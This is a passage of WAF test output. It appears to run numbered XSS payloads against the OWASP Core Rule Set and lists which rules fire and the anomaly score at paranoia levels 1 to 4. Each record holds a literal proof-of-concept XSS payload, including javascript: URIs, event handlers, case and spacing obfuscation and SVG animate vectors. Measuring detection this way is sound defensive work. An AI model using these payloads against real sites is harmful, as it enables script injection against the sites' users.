941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 44
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 57
****** payload-083 ********
Payload:
payload=<body onwheel=alert(1)></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
****** payload-084 ********
Payload:
payload=<iframe src="javascript:alert(1)"></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 40
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 56
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-085 ********
Payload:
payload=<object data="javascript:alert(1)"></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941300 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 30
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941300 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 40
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941300 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 56
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941300 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-086 ********
Payload:
payload=<embed src="javascript:alert(1)"></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941230 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 30
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941230 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 45
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941230 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 61
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941230 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 74
****** payload-087 ********
Payload:
payload=<a href="javascript:alert(1)">XSS</a></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 48
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 61
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 74
****** payload-088 ********
Payload:
payload=<a href="JaVaScript:alert(1)">XSS</a></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 48
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 61
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 74
****** payload-089 ********
Payload:
payload=<a href=" javascript:alert(1)">XSS</a></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 48
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 64
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 77
****** payload-090 ********
Payload:
payload=<a href="javas cript:alert(1)">XSS</a></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 43
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 56
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-091 ********
Payload:
payload=<a href="javascript
--- Paranoia Level 1 ---
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 15
--- Paranoia Level 3 ---
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
Total Incoming Score: 25
--- Paranoia Level 4 ---
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 38
****** payload-092 ********
Payload:
payload=<a href="javascript :alert(1)">XSS</a></a>
--- Paranoia Level 1 ---
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 10
--- Paranoia Level 2 ---
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 38
--- Paranoia Level 3 ---
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 51
--- Paranoia Level 4 ---
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 64
****** payload-093 ********
Payload:
payload=<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 30
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 58
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 74
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 87
****** payload-094 ********
Payload:
payload=<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
